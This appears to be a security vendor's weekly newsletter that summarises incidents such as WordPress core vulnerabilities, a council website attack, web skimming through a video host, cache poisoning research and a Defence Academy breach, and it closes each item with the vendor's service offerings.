Cyber Security Newsletter Week 6

WordPress Core Vulnerabilities Hits Millions of Sites

WordPress announced high threat level vulnerabilities that were introduced by the core development team itself. WordPress announced it has patched four vulnerabilities that are rated as high as 8 on a scale of 1 to 10. The vulnerabilities are in the WordPress core itself and are due to flaws introduced by the WordPress development team itself. The WordPress announcement was short of details of how severe the vulnerabilities were, and the details were scant. However, the United States Government National Vulnerability Database where vulnerabilities are logged and publicized rated the vulnerabilities as high as 8.0 on a scale of 1 to 10, with ten representing the highest danger level.




The four vulnerabilities are:

- SQL injection due to lack of data sanitization in WP_Meta_Query (severity level rated high, 7.4)
- Authenticated Object Injection in Multisites (severity level rated medium 6.6)
- Stored Cross Site Scripting (XSS) through authenticated users (severity level rated high, 8.0)
- SQL Injection through WP_Query due to improper sanitization (severity level rated high, 8.0)

Three out of four of the vulnerabilities were discovered by security researchers outside of WordPress. WordPress had no idea until they were notified. The vulnerabilities were privately disclosed to WordPress, which allowed WordPress to fix the problems before they became widely known.

Solutions:
• Web protection
• Review and Monitoring reports
• Cyber Consultancy

Cyber-attack disrupts Gloucestershire Council's website

A council is working to restore parts of its website 11 days after they were crippled by a cyberattack. Gloucester City Council has been trying to fix several of its online services since the incidenton 20 December. Systems affectedinclude the council's online revenue and benefits sections as well as planning and customer services. It asked for patience while the services are restored and urged people to email it directly with any issues they have. The council is also working with the National Crime Agency (NCA) and the National Cyber Security Centre (NCSC) to fix the issue. Residents are also unable to access interactive online application forms used to claim for housing benefit, council tax support, test and trace support payments and discretionary housing payments. Due to the attack, the council's planning application website is also unavailable, the Local Democracy Reporting Service said.

Solutions:
• Ransomware protection
• Vulnerability Scanning
• Antivirus

Web skimming attacks on hundreds of real estate websites deployed via cloud video hosting service

Web skimming attacks are targeting hundreds of real estate websites via a cloud-based video hosting service, researchers have warned. Web skimming attacks occur when malicious script is injected into sites to steal information entered web forms. For example, an online booking form might ask for a website user’s personal details and payment information. If this site was vulnerable to skimming attacks, the malicious actors could intercept the data. In the case of the attacks described here, the attacker injected the skimmer JavaScript codes into video, so whenever others import the video, their websites get embedded with skimmer codes as well. The researchers detailed how the skimmer infected the websites, explaining that when the cloud platform user creates a video player, the user is allowed to add their own JavaScript customizations by uploading a .js file to be included in their player. In this specific instance, the user uploaded a script that could be modified upstream to include malicious content. We infer that the attacker altered the static script at its hosted location by attaching skimmer code. Upon the next player update, the video platform re-ingested the compromised file and served it along with the impacted player. “From the code analysis, we know the skimmer snippet is trying to gather victims’ sensitive information such as names, emails, phone numbers, and send them to a collection server, https://cdn-imgcloud[.]com/img, which is also marked as malicious in VirusTotal.” The websites in question were all owned by the same parent company, which hasn’t been named. Unit 42 researchers said they have informed the organization and have helped them to remove the malware.

Attackers leverage software supply chain to compromise high-traffic sites

Solutions:
• Web protection
• Review and Monitoring reports
• Cyber Consultancy

Researcher discovers 70 web cache poisoning vulnerabilities nets $40k in bug bounty rewards attack

Despite being a known and well-documented vulnerability, web cache poisoning continues to crop up around the web. In extensive research of many websites, including some high-traffic online services, security researcher Iustin Ladunca (Youstin) recently discovered 70 cache poisoning vulnerabilities with various impacts. Web cache poisoning attacks target the intermediate storage points between web servers and client devices, such as point-of-presence servers, proxies, and load balancers. These intermediaries help improve the performance of websites by storing local versions of web content to speed up their delivery to web clients. Web cache poisoning attacks manipulate the behavior of cache servers and how they respond to specific URL requests by clients. Several of the web cache vulnerabilities resulted in denial of service (DoS) attacks. Cache servers use some headers as keys to store and retrieve URL requests. By using invalid values in unkeyed headers, ladunca was able to force the servers to cache error responses and later serve them instead of the original content, which made the target webpages inaccessible to clients.

Solutions:
• DDoS Prevention
• Awareness Training (poisoning attacks)
• Web protection (Cache poisoning attacks)

UK’s Defence Academy hit by cyberattack which caused ‘significant’ damage

Attack was possibly launched by hostile foreign state such as Russia or China, says Air Marshal Edward Stringer. The UK's Defence Academy was hit by a cyberattack last year which caused “significant” damage, according to a retired high-ranking officer. Air Marshal Stringer said the security breach was discovered in March 2021 and the Defence Academy, which teaches thousands of military personnel, diplomats and civil servants each year, was forced to rebuild its network, with the damage yet to be fully rectified months on. Commenting on the likelihood of the attack being linked to a foreign government, like Iran or North Korea, AM Stringer said: “It could be any of those or it could just be someone trying to find a vulnerability for a ransomware attack that was just, you know, a genuine criminal organisation.” This attack is not suspected to be of any financial gain. He said there were “external agents on our network who looked like they were there for what looked pretty quickly like nefarious reasons”. Sky News reported that no sensitive information was stored on the academy's network. AM Stringer said the attack was not successful and while the hackers may have been using the academy as a “backdoor” to other Ministry of Defence (MoD) systems, there were no breaches beyond the school. The security breach was discovered in March 2021 and the Defence Academy was forced to rebuild its network.

Solutions:
• Ransomware Protection
• End-point protection
• Vulnerability Scanning (Monitor potential loopholes which could impact your business)